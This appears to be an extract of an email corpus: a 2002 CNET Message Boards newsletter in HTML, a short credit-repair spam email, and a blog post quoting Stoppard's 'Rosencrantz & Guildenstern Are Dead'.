 				&lt;font size="-2"&gt;In Downloads: Browsing Companions&lt;/font&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=ac-RbKtQ0UKmLPDUMPdWfGJ0kSyVjyR" &gt;&lt;b&gt;More User Opinions&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 				&lt;!-- /Hot Products --&gt;
 &lt;!--Tech24 promo--&gt;				
 &lt;TABLE WIDTH="136"  CELLSPACING="0" CELLPADDING="0" BORDER="0"&gt;
 &lt;TR&gt;&lt;td&gt;
 &lt;div align="center"&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;b&gt;Computer Problems?&lt;/b&gt; Try our Live Support from a Live technician!&lt;/font&gt;&lt;/div&gt;
 &lt;/tR&gt;&lt;/td&gt;
 &lt;/table&gt;
 &lt;STYLE&gt;
 	.black {color: #000000; font-family: Verdana, Arial, Helvetica, sans-serif; font-style: normal; font-size: 11px; font-weight: normal;}
 &lt;/STYLE&gt;
 &lt;SCRIPT LANGUAGE=javascript&gt;
 &lt;!--
 function clearTextarea() {
 	if ((document.QuestionEntry.Question.value == "Type here and click go.")) {
 		document.QuestionEntry.Question.value = "";
 	} else {
 		return;
 	}
 }
 //--&gt;
 &lt;/SCRIPT&gt;
 &lt;form method="post" action="http://www.tech24.com/process/QuestionRedirect.asp" name="QuestionEntry"&gt;
 &lt;input type="hidden" name="Partner" value="Tech24CNet"&gt;
 &lt;input type="hidden" name="Portal" value="Tech24CNet"&gt;
 &lt;TABLE WIDTH="130" BORDER="0" CELLSPACING="0" CELLPADDING="0" CLASS="black"&gt;
 	&lt;TR&gt;
 		&lt;TD WIDTH="220" COLSPAN="3" VALIGN="top"&gt;&lt;IMG SRC="http://www.tech24.com/images/cn_01.gif" ALT="" WIDTH="130" HEIGHT="64" BORDER="0"&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD WIDTH="2" VALIGN="top" BGCOLOR="#000000"&gt;&lt;IMG SRC="http://www.tech24.com/images/transpar.gif" WIDTH="2" HEIGHT="1" ALT="" BORDER="0"&gt;&lt;/TD&gt;
 		&lt;TD WIDTH="126" ALIGN="center" VALIGN="top" BGCOLOR="#F0F2E4" CLASS="black"&gt;
 		&lt;BR&gt;&lt;textarea name="Question" cols="11" rows="3" wrap="virtual" onFocus="clearTextarea()"&gt;Type here and click go.&lt;/textarea&gt;
 		&lt;BR&gt;&lt;BR&gt;&lt;input type=image src="http://www.tech24.com/images/go.gif" value=submit name=submit border=0&gt;
 		&lt;BR&gt;&lt;IMG SRC="http://www.tech24.com/images/transpar.gif" WIDTH="126" HEIGHT="1" ALT="" BORDER="0"&gt;&lt;/TD&gt;
 		&lt;TD WIDTH="2" VALIGN="top" BGCOLOR="#000000"&gt;&lt;IMG SRC="http://www.tech24.com/images/transpar.gif" WIDTH="2" HEIGHT="1" ALT="" BORDER="0"&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD WIDTH="220" COLSPAN="3" VALIGN="top"&gt;&lt;IMG SRC="http://www.tech24.com/images/zc_04.gif" ALT="" WIDTH="130" HEIGHT="9" BORDER="0"&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;!-- /Tech24 promo--&gt;				
 &lt;!-- promo section --&gt;				
 	&lt;/td&gt;
 	&lt;td width=9 rowspan=2&gt;
 		&lt;img src="http://www.cnet.com/i/dp/dd_c.gif" width="9" height="60" border="0"&gt;&lt;br&gt;
 		&lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;tr&gt;&lt;td bgcolor="#ffccoo"&gt;&lt;img src="/b.gif" width="9" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 	&lt;td width=1 bgcolor="#000000" rowspan=2&gt;
 		&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;td width=10 bgcolor="#ffcc00"&gt;&lt;img src="/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;td width=430 bgcolor="#ffffff"&gt;
 		&lt;table cellpadding=0 cellspacing=0 border=0 width=430 bgcolor="#ffffef"&gt;
 			&lt;tr valign=top&gt;
 			&lt;td width=10&gt;&lt;img src="/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=412&gt;
 			&lt;table cellpadding=8 cellspacing=0 border=0&gt;
 				&lt;tr&gt;&lt;td&gt;&lt;font face="Arial, Helvetica" size="-2"&gt;July 11, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;/table&gt;
 				&lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
 				&lt;tr valign=top&gt;
 					&lt;td width=10&gt; &lt;/td&gt;
 					&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
 						&lt;font color="#333333"&gt;&lt;B&gt;Dear Readers,&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 						&lt;font size="-1"&gt;With all the corporate scandals--such as WorldCom and Enron--surrounding us, who can you trust nowadays? Well, for starters, you can trust the CNET Message Boards. The &lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEk7X_ZoirgVnxXFZcIuInR" &gt;CNET Message Boards&lt;/a&gt; are as real as it gets. When it comes down to giving or receiving honest tech advice, there's no better place to be. In the Boards there are no reviews or tests by professionals, just real, true-life experiences and discussions from people like you and me who share one common interest: the love of today's challenging technology. There are no sneaky execs here or scandals to worry about, so if you have a specific problem or question 
 in mind, post it! You won't be disappointed. 
  &lt;/font&gt;&lt;br&gt;&lt;br&gt;
 						&lt;font face="arial, helvetica" size="-2"&gt;
 						&lt;table cellpadding=0 cellspacing=0 border=0 width=55 align=left&gt;
 						&lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Promos/mb_0503_pushpin_pg.gif" width="50" height="50" border="0"&gt;&lt;/td&gt;&lt;/tr&gt;
 						&lt;/table&gt;
 						Lee Koo&lt;br&gt;
 						CNET Community&lt;br&gt;
 						Got suggestions? Email me: &lt;a href="mailto:messageboards@cnet.com"&gt;messageboards@cnet.com&lt;/a&gt;&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;/table&gt;
 			&lt;/td&gt;
 			&lt;td width=8&gt;&lt;img src="/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;/table&gt;
 	&lt;!-- bottom rule --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 	&lt;tr valign=top&gt;
 		&lt;td bgcolor="#F7D69C"&gt;&lt;img src="/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;table cellpadding=10 cellspacing=0 border=0 width=430&gt;
 &lt;tr&gt;&lt;td&gt;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href="http://clickthru.online.com/Click?q=d7-wk3ZQLWkVXkIDzcRmBekeVktk2eR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy2A7_Surm1kOqFb2GVaGyR"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href="http://clickthru.online.com/Click?q=01-9oXDI2jHgI0F8rUvurMPGPxZ6RlR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=16-T_cjI4cFVq9DiQgDblRuaBDxRU4R"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href="http://clickthru.online.com/Click?q=2b-2FVYINzsBDAwzYkwzk0xBfd-8WrR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	2. &lt;a href="http://clickthru.online.com/Click?q=40-6Pp4Idn8DzgEoVdeVXCHnpqL0wRR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	3. &lt;a href="http://clickthru.online.com/Click?q=55-TAHaIKJ8XqrcDenqm86ccJ_2d2ZR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	4. &lt;a href="http://clickthru.online.com/Click?q=6a-z_30IeWiUkiY5uOzceCGFySNP8dR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	5. &lt;a href="http://clickthru.online.com/Click?q=7f-bn6KIIP67D5tHJD9IO3JewkhBpuR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=94-rOVNQaI7DcUAYNHJ5elUjfr5JQyR"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&lt;a name="ThisweekinCNETMessageBoards"&gt;&lt;/a&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 	&lt;tr valign=bottom&gt;
 		&lt;td width=75&gt;&lt;img src="http://www.cnet.com/i/nl/mb/sub_thiswk.gif" width="290" height="19" border="0" alt="Simple Questions w/Simple Answers"&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;td width=335&gt;&lt;font face="arial, helvetica" size="-1" color="#660000"&gt;&lt;b&gt; &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan=2 bgcolor="#cccccc"&gt;&lt;img src="/b.gif" width=1 height=1&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="/b.gif" width=1 height=8&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 			&lt;font face="Arial, Helvetica"&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUr2MhDl8RWLXZBXqONOVnR" &gt;Why I don't use firewalls&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;Do you need some honest opinions? Despite all the horror stories that you hear of hackers and Trojans intruding on one's personal computer, hear why one of our veteran moderators refuses to use a firewall. This discussion gets a bit heated, but her point was well taken. Take a look and see why she refuses, and if you have a cent or two to throw in, the donation jar is wide open. &lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZrsdzL4Gl5w8PF_jEuwteR" &gt;More Security and Virus Alerts discussions&lt;/a&gt;&lt;/font&gt;&lt;p&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;The scoop on USB 2.0&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;The chances are that the next time you pick up an external computer peripheral, it will be utilizing USB 2.0 to connect to your computer. So what is USB 2.0? Is it that much faster than USB 1.1? Will your current USB port be compatible with peripherals with the new version? Well if you have similar questions, I gathered up some discussion on this topic in hopes that it will bring a better understanding of what's in store for USB 2.0. Take your pick. 
 &lt;ul&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=d4-E0SqQ0Exfl3rJ00_4Mc3148lk6yR" &gt;USB vs. USB 2.O&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=e9-gdzpQxVzOsqJEmWTRnU3P83P5XlR" &gt;How to upgrade from USB 1.1 to 2.0?&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=fe-xkIgQwgwyCPGpumeE4rbg6amtI4R" &gt;USB 2.0 with reverse compatibility with USB 1.1?&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=13-NxSZI3XWrkFb3uCssDLfzpHOCerR" &gt;More Hardware discussions&lt;/a&gt;
 &lt;/ul&gt;&lt;/font&gt;&lt;p&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=28-A2wXIRd4OH8PluPEL2t1VlTK8yiR" &gt;Windows XP not any faster than Windows 98SE?!&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;Many users have jumped ship and moved on to newer and supposedly better things such as Windows XP, but what if it doesn't perform up to par and is actually slower than the previous OS that you had? Check out this discussion; what's newer may not always be faster. &lt;a href="http://clickthru.online.com/Click?q=3d-oi9NIbz4iUT0aSFvwlGWUTnaNtPR" &gt;More Windows XP discussions&lt;/a&gt;
 &lt;/font&gt;&lt;p&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=52-LUXoIrJtzdqPUMRMWz8AtIQwjjnR" &gt;Best type of backup system to use for someone that is indigent?&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;Backing up your hard-drive system sounds like a task for veteran, but is it? In 
 this discussion, a beginner is asking for sound advice on the best type of backup system to use, and sure enough, he received a bunch of options to choose from. If you're in that same boat and looking for the best ways to back up some of that important data of yours, this discussion is for you. Have a look. &lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEDCiQkw-RWhKPAKa1CPIuR" &gt;More Computer Newbies discussions&lt;/a&gt;
 &lt;/font&gt;&lt;p&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=7c-7NCZIZWc-BbxpUzfLHDx1984BOsR" &gt;Warning for kids and teens online&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;If you're a parent, this may be something that you may want to read about kids online. I found it interesting enough to pass along because I know someday I'll be faced with the same worries when my kids are out surfing the web. So have a look, and if it doesn't interest you, pass it on to someone who may find it informative. 
 &lt;/font&gt;&lt;p&gt;
 &lt;!-- Simple Question with Simple Answers--&gt;
 &lt;a name="SimpleQuestionswSimpleAnswers"&gt;&lt;/a&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 	&lt;tr valign=bottom&gt;
 		&lt;td width=75&gt;&lt;img src="http://www.cnet.com/i/nl/mb/sub_qa.gif" width="290" height="19" border="0" alt="Simple Questions w/Simple Answers"&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;td width=335&gt;&lt;font face="arial, helvetica" size="-1" color="#660000"&gt;&lt;b&gt; &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan=2 bgcolor="#cccccc"&gt;&lt;img src="/b.gif" width=1 height=1&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="/b.gif" width=1 height=8&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="100%" cellpadding=4 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;li&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font color="#333333"&gt;&lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzTtqDAHtOzeFOPq1FsnynR" &gt;&lt;b&gt;XP and defragmenting&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;li&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font color="#333333"&gt;&lt;a href="http://clickthru.online.com/Click?q=a7-fR_2Q8BwDGf6vxOLF5vLk7KCgFeR" &gt;&lt;b&gt;Can RAM be "worn out"?&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;li&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font color="#333333"&gt;&lt;a href="http://clickthru.online.com/Click?q=bc-zkPJQ6BdhiDNyFMmobF8XEDxwcyR" &gt;&lt;b&gt;WinModem vs. "full" modem&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;
 &lt;!-- Help your fellow Boarders --&gt;
 &lt;a name="HelpyourfellowBoarders"&gt;&lt;/a&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 	&lt;tr valign=bottom&gt;
 		&lt;td width=75&gt;&lt;img src="http://www.cnet.com/i/nl/mb/sub_hp.gif" width="290" height="19" border="0" alt="Help your fellow Boarders"&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;td width=335&gt;&lt;font face="arial, helvetica" size="-1" color="#660000"&gt;&lt;b&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan=2 bgcolor="#cccccc"&gt;&lt;img src="/b.gif" width=1 height=1&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="/b.gif" width=1 height=8&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="100%" cellpadding=4 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;li&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font color="#333333"&gt;&lt;a href="http://clickthru.online.com/Click?q=d1-ulOzQpErnM1e6dv10-kl0aSxkZlR" &gt;&lt;b&gt;My PC won't wake up&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;from Jen Smith&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;&lt;li&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font color="#333333"&gt;&lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVXfH8KRKTVqS8CMB0qvseR" &gt;&lt;b&gt;Purchasing a CD-RW--what kind?&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;from Graham Hurst&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;!-- saved from url=(0101)file://\\Cnet2\marketing\Cartel\Inventory%20Hub\NL%20Bricks--Elsewhere\CNET\NLHorizontal_2.18.02.html --&gt;
 &lt;!--Horizontal Brick--&gt;
 &lt;P&gt;&lt;IMG border=0 height=20 src="http://home.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 
 NOSEND="1"&gt; &lt;IMG border=0 height=8 src="http://home.cnet.com/i/it/newsletter/rule2.gif" width=410 NOSEND="1"&gt; 
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
   &lt;TBODY&gt;
   &lt;TR vAlign=top&gt;
     &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
       &lt;UL&gt;
         &lt;LI&gt;&lt;A 
         href="http://www.tech24.com/cnet.asp?tag=st.nl.horizontal.xpro-txt.ba_th"&gt;Live Tech Help. Submit your question now.&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://news.com.com/1200-1120-933954.html?tag=st.nl.horizontal.xpro-txt.newsvision"&gt;CNET News.com: Top CIOs on the future of IT.&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://www.cnet.com/techjobs/0-7067.html?tag=st.nl.horizontal.xpro-txt.tj"&gt;Find a job you love. Over 1 million postings&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://www.cnet.com/go/to?tag=st.nl.horizontal.xpro-txt&amp;destURL=http://techupdate.zdnet.com/techupdate/stories/main/0,14179,2868051,00.html"&gt;ZDNet: This IT director has had enough of Microsoft&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://electronics.cnet.com/electronics/0-9400734-1304-8810525.html?tag=st.nl.horizontal.xpro-txt.ba_ed"&gt;May Editors" Choice Award: Pioneer"s Home Theater System HTS - 910DV&lt;/A&gt; 
 &lt;/LI&gt;&lt;/UL&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
   &lt;!-- End Horizontal Brick--&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;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is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;p&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=fc-Wp5mraw7aZZWGxrl9-Q5A6U55dPBfsRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-4W8PxBpEX3VynhNBuCqlR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=26-KqPVIiMHfeZpwSuBBBkqU8niQ74R"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href="http://clickthru.online.com/Click?q=3b-XhxVINdHJgqnEoeFPcZsjpRp-LrR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=50-M_CBIR0XschqArXASOnO8CtmMgRR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=65-K82zIDPtMv9rRKXD70VOf0m8P9ZR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=7b-prT_IBZIOdgDoTLbDr4q1O7VpJcR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_IdCTjs6epVb8HYULuonXiR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZTGf0xQGxsIC1b2OB8OEPR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e430&amp;ISSUE=2002-07-11" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=ba-m-95-hpMAfgrcStOu5LdlZB0PRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Clean your Bad Credit ONLINE?                      14010
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;BODY BGCOLOR=3D#FFFFFF TEXT=3D#000000 LINK=3D#000000 VLINK=3D#000000 ALIN=
 K=3D#000000&gt;
 &lt;BR&gt;
 &lt;CENTER&gt;
 &lt;TABLE WIDTH=3D400 BORDER=3D0 CELLPADDING=3D0 CELLSPACING=3D1 BGCOLOR=3D99=
 9999&gt;
 &lt;TR&gt;
 &lt;TD&gt;
 &lt;TABLE BORDER=3D0 CELLPADDING=3D4 CELLSPACING=3D0 BGCOLOR=3D#FFFFFF BACKGR=
 OUND=3Dhttp://61.172.250.143/webcredit/images/background_arrow.gif WIDTH=3D=
 400&gt;
 &lt;TR&gt;
             &lt;TD&gt;&lt;A HREF=3Dhttp://61.172.250.139/webcredit/index.php?Aff=3D=
 6&gt;&lt;IMG SRC=3Dhttp://61.172.250.143/webcredit/images/banner_email.gif BORDE=
 R=3D0&gt;&lt;/A&gt;&lt;BR&gt;
 &lt;IMG SRC=3Dhttp://61.172.250.143/webcredit/images/line.gif&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;A HREF=3Dhttp://61.172.250.139/webcredit/index.php?Aff=3D6&gt;&lt;img src=3Dhtt=
 p://61.172.250.143/webcredit/images/body_email.gif alt=3D"" border=3D"0"&gt;&lt;=
 /A&gt;
 &lt;BR&gt;
 &lt;FONT FACE=3DVerdana SIZE=3D2&gt;Thank You,&lt;/FONT&gt;&lt;BR&gt;
 &lt;IMG SRC=3Dhttp://61.172.250.143/webcredit/images/thankyou.gif&gt;
 &lt;BR&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD&gt;
 &lt;IMG SRC=3Dhttp://61.172.250.143/webcredit/images/line.gif&gt;&lt;BR&gt;&lt;br&gt;
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;Your email address was obtained from a purch=
 ased 
 list, Reference # 1220-14000.&amp;nbsp;&amp;nbsp;If you wish to unsubscribe from t=
 his list, please
 &lt;a href=3D"http://61.172.250.143/remove/remove1.html"&gt;Click here&lt;/a&gt; and e=
 nter your
 name into the remove box. If you have previously
 unsubscribed and are still receiving this message, you may email our
 &lt;a href=3D"mailto:solutions@runsaa.com?Subject=3DAbuse Report"&gt;Abuse Contr=
 ol Center&lt;/a&gt;,
 or call 1-888-763-2497, or write us at: NoSpam, 6484 Coral Way,
 Miami, FL, 33155".&lt;/FONT&gt;&lt;br&gt;
 &lt;BR&gt;
 &lt;IMG SRC=3Dhttp://61.172.250.143/webcredit/images/line.gif&gt;&lt;BR&gt;
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;&amp;copy; 2002 Web Credit Inc. All Rights Reser=
 ved&lt;/FONT&gt;&lt;FONT FACE=3D"Verdana" SIZE=3D"1"&gt;.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/CENTER&gt;
 &lt;BR&gt;
 &lt;/BODY&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Words fail me
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/10.html#words_fail_me
 Date: 2002-10-10T02:34:18-05:00
 _The Morning News_: Rosencrantz &amp; Joshua[1]. Words fail me, which is a rare 
 and pleasant gift, thank you. Instead, I will simply take this opportunity to 
 quote the original _Rosencrantz &amp; Guildenstern Are Dead_, the excellent 
 play by Tom Stoppard which I keep nestled in my one remaining bookshelf[2] 
 between the _Tao Te Ching_ and Roald Dahl's _Charlie and the Chocolate Factory_
 . 
     Guil: Exactly, it's a matter of asking the right questions and giving away 
     as little as we can. It's a game.
     Ros: And then we can go?
     Guil: And receive such thanks as fits a king's remembrance.
     Ros: I like the sound of that. Waht do you think he meant by remembrance?
     Guil: He doesn't forget his friends.
